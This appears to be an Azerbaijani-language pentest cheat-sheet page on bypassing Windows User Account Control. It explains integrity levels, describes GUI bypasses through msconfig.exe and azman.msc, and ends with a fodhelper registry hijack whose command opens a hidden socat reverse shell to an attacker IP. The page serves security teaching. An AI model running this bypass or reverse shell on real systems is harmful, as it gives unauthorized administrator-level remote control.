Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • UAC nədir?
  • İntegrity Levels
  • Tətbiqin adi üsulla və Administrator kimi acılması
  • UAC işləmə prinsipi
  • GUİ əsaslı UAC bypass
  • msconfig.exe
  • azman.msc
  • Fodhelper

Was this helpful?

  1. AD Pentesting
  2. Local Privilege Escalation

UAC Bypass

PreviousUseful Local Priv Esc ToolsNextLateral Movement

Last updated 1 year ago

Was this helpful?

UAC nədir?

İstifadəçi Hesabına Nəzarət (UAC) hər hansı yeni prosesi standart olaraq imtiyazsız hesabın təhlükəsizlik kontekstində işləməyə məcbur edən Windows təhlükəsizlik xüsusiyyətidir. Bu siyasət idarəçilərin özləri də daxil olmaqla istənilən istifadəçinin başlatdığı proseslərə şamil edilir. İdeya ondan ibarətdir ki, biz bəzi hərəkətlərə icazə verilməli olub-olmadığını müəyyən etmək üçün yalnız istifadəçinin şəxsiyyətinə etibar edə bilmərik.

Bu, ziddiyyətli görünsə də, BOB istifadəçisinin bilmədən İnternetdən zərərli proqram yükləməsini təsəvvür edin. Əgər BOB Administratorlar qrupunun bir hissəsidirsə, onun işə saldığı hər hansı proqram onun giriş nişanı imtiyazlarını miras alacaq. Beləliklə, BOB zərərli proqramı işə salmaq qərarına gəlsə və UAC deaktiv edilsə, zərərli proqram dərhal administrator imtiyazları qazanacaq. Bunun əvəzinə, UAC aktivləşdirildikdə zərərli proqram qeyri-inzibati giriş nişanı ilə məhdudlaşdırılacaq.

İntegrity Levels

UAC , hər birinə İntegrity Levels (IL) təyin etməklə istifadəçiləri, prosesləri və resursları fərqləndirməyə imkan verən bir mexanizm olan Məcburi Dürüstlüyə Nəzarətdir (MIC). Ümumiyyətlə, daha yüksək IL giriş nişanı olan istifadəçilər və ya proseslər aşağı və ya bərabər IL-ləri olan resurslara daxil ola biləcəklər. MIC adi Windows DACL -lərdən üstündür , ona görə də DACL-ə uyğun olaraq resursa daxil olmaq icazəniz ola bilər, lakin IL-nin kifayət qədər yüksək olmamasının

İntegrity Levels

Low

Ümumiyyətlə İnternetlə qarşılıqlı əlaqə üçün istifadə olunur (məsələn, Internet Explorer). Çox məhdud icazələrə malikdir.

Medium

Standart istifadəçilərə və Administratorların filterlənmiş tokenlərinə təyin edilmişdir.

High

UAC aktiv olduqda Administratorların yüksəldilmiş tokenləri tərəfindən istifadə olunur. UAC deaktiv edilərsə, bütün idarəçilər həmişə yüksək IL işarəsindən istifadə edəcəklər.

System

Sistem istifadəsi üçün qorunur.

Tətbiqin adi üsulla və Administrator kimi acılması

Adi konsolu açmağa çalışarkən, biz onu ya imtiyazlı olmayan istifadəçi, ya da administrator kimi aça bilərik. Seçimimizdən asılı olaraq, yaranan prosesə Orta və ya Yüksək bütövlük səviyyəli token təyin ediləcək:

Cmd -ə whoami /priv yazaraq icazələrə baxıb müqaisə edə bilərsiz:

Solda orta IL ilə filterlənmiş token var və demək olar ki, heç bir imtiyaz təyin olunmayıb. Sağda, prosesin yüksək IL ilə işlədiyini və daha çox imtiyazlara malik olduğunu görə bilərsiniz. O qədər də aydın olmayan başqa bir fərq, orta IL prosesinin Administratorlar qrupunun bir hissəsi olmaqla bağlı hər hansı imtiyazların effektiv şəkildə rədd edilməsidir.

UAC işləmə prinsipi

  1. İstifadəçi tətbiqi administrator kimi işə salmaq buttonuna basır.

  2. ShellExecute API çağırışı runas dan istifadə edilir .

  3. Sorğu yüksəkliyi idarə etmək üçün Appinfo-ya yönləndirilir.

  4. Tətbiq manifestində AutoElevation-a icazə verilib-verilməməsi yoxlanılır.

  5. Appinfo secure desktopda UAC sorğusunu göstərən consent.exe-ni icra edir . secure desktop sadəcə olaraq, digər proseslərin UAC sorğusuna hər hansı şəkildə müdaxilə etməməsi üçün faktiki istifadəçinin desktop işləyən hər bir prosesdən prosesləri təcrid edən ayrıca iş masasıdır .

  6. İstifadəçi tətbiqi administrator kimi işə salmağa razılıq verərsə, Appinfo xidməti istifadəçinin Yüksək Tokenindən istifadə edərək sorğunu yerinə yetirəcək. Bundan sonra Appinfo yeni prosesin əsas proses identifikatorunu yüksəklik tələb olunan qabığa işarə edəcək.

GUİ əsaslı UAC bypass

msconfig.exe

Bu tip UAC bypass əsasən real dünyda baş vercək senariyə uyğun deyil.Bəzi proseslər bizdən UAC tələb etmədən Yüksək lL ilə runlanır məsələn:msconfig.exe,azman.msc.Əgər biz bu proseslərə shell alamqı məcbur etsək on yüksək lL ilə shell alar.Bunun üçün windows+R düymələrini basıb açılan hissəyə msconfig.exe yazırıq.

Acılan pəncərədə tool hissəsinə gəlib command promp launch basın.

Görəcəksizki cmd Administrator icazələri ilə acılır.

azman.msc

Msconfig-də olduğu kimi, azman.msc istifadəçinin qarşılıqlı əlaqəsini tələb etmədən avtomatik yüksəldəcək. Bu proses içərisindən bir qabıq çıxarmaq üçün bir yol tapa bilsək, UAC- dan yan keçəcəyik . Qeyd edək ki, msconfig-dən fərqli olaraq azman.msc-də qabıq yaratmaq üçün nəzərdə tutulmuş daxili üsul yoxdur. Bir az yaradıcılıqla bunun öhdəsindən asanlıqla gələ bilərik.

Acılan ekranda help hissəsinə help topics tiklayın.

Ardından acılan pəncərədən istənilən yerə sağ klik basıb view source hissəsinə daxil oluruq.

Bu, bir shell əldə etmək üçün istifadə edə biləcəyimiz bir notepad prosesini yaradacaq. Bunu etmək üçün Fayl->open bölməsinə keçin və sağ alt küncdəki birləşmə qutusunda Bütün Faylları seçdiyinizə əmin olun . Getmək C:\Windows\System32və axtarıncmd.exevə Aç seçimini etmək üçün sağ klikləyin:

Bu, bir daha UAC- dan yan keçəcək və bizə yüksək bütövlükdə əmr sorğusuna giriş imkanı verəcək.

Yuxarıda göstərilən üsullar UAC bypass məntiqini izah etmək üçün yazılib.Əgər sistemə shell alıb girsək bu usuları istifadə edə biməyəcəyik.

Fodhelper

Fodhelper.exe əlavə dillər, defolt olaraq quraşdırılmamış proqramlar və ya digər əməliyyat sistemi xüsusiyyətləri daxil olmaqla, Windows-un isteğe bağlı xüsusiyyətlərini idarə etmək üçün cavabdeh olan Windows-un defolt icraedici proqramlarından biridir. Sistem konfiqurasiyası üçün istifadə edilən əksər proqramlar kimi, fodhelper standart UAC parametrlərindən istifadə edərkən avtomatik yüksəldə bilər ki, standart inzibati tapşırıqları yerinə yetirərkən administratorlardan yüksəltmə tələb olunmasın. Msconfig-dən fərqli olaraq, biz artıq autoElevate icra olunan proqrama nəzər salsaq da, fodhelper GUI-yə giriş olmadan sui-istifadə edilə bilər.

Əgər biz uzaqdan shell almışıqsa birinci whoami /priv yazıb icazələrimizə baxa bilərik.

Beləliklə biz görürüki bu shell administrator kimi acılmayib bunun üçün biz UAC bypass etməliyik.

Bunu üçün aşağıdaki əmrləri istifadə edirik:

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
 
 
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"

reg add %REG_KEY% /v "DelegateExecute" /d "" /f

reg add %REG_KEY% /d %CMD% /f

daha sonra öz terminalimizda dinləməni acırıq:

indi fodhelper.exe yazıb runlayırıq və beləliklə shell alırıq və whoami /priv yazıb baxsaq görəriki administratır kimi daxil olmuşuq və beləliklə UAC bypass etmiş oluruq: